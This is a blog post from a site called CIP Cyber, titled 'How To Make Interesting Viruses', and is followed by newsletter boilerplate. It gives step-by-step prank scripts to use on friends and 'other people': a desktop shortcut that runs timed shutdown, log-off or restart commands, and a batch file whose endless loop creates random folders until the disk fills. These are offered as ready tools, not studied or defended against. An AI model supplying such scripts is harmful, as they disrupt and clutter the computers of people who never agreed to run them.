CIP Cyber

How To Make Interesting Viruses

Table of Contents

On different episode of malware you have learned a lot of things about viruses and worms and after reading episode 3 have able to make your own virus by eh-virus maker.
Now at this time i will show you how make some interesting and little bit funny viruses to make fun with your friends and other people.

  • First one is the virus that shutdown any PC after execute here is the steps to make this. 
Create shortcut,(Right click on your desktop and go to new -> shortcut )
After this will appear window and that is where you type the code

shutdown -s -t 300 -c “Your Message”


To log of computer type

shutdown -l -t 300 -c “your message”
To restart computer type
shutdown -r -t 300 -c ” your message”
 
Click next and than finish, your virus has been saved on your desktop.

  • On the second is the virus which creates multiple folders in a second. 
  1. Open a notepad and type 
@echo off
color 0a
:eh
md %random%
goto eh 
Now save this file to anyname.bat    And whenever someone click on this file it creates a lot of folders in a second like:





Note: If you enjoyed this post, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
CIP Cyber Staff

CIP Cyber Staff

CIP Cyber Staff comprises CIP cybersecurity experts committed to delivering comprehensive information on critical infrastructure protection. The content covers diverse topics, equipping professionals to defend organizations and communities in an ever-evolving cyber landscape.

Most popular

Industrial Cybersecurity

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Related Articles

Do Hackers Really use Metasploit? NO!

Undoubtedly, Metasploit is one of the most organized, well-developed tools in the pen-testers toolbox. But, do hackers use it? Some of them, but not the

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings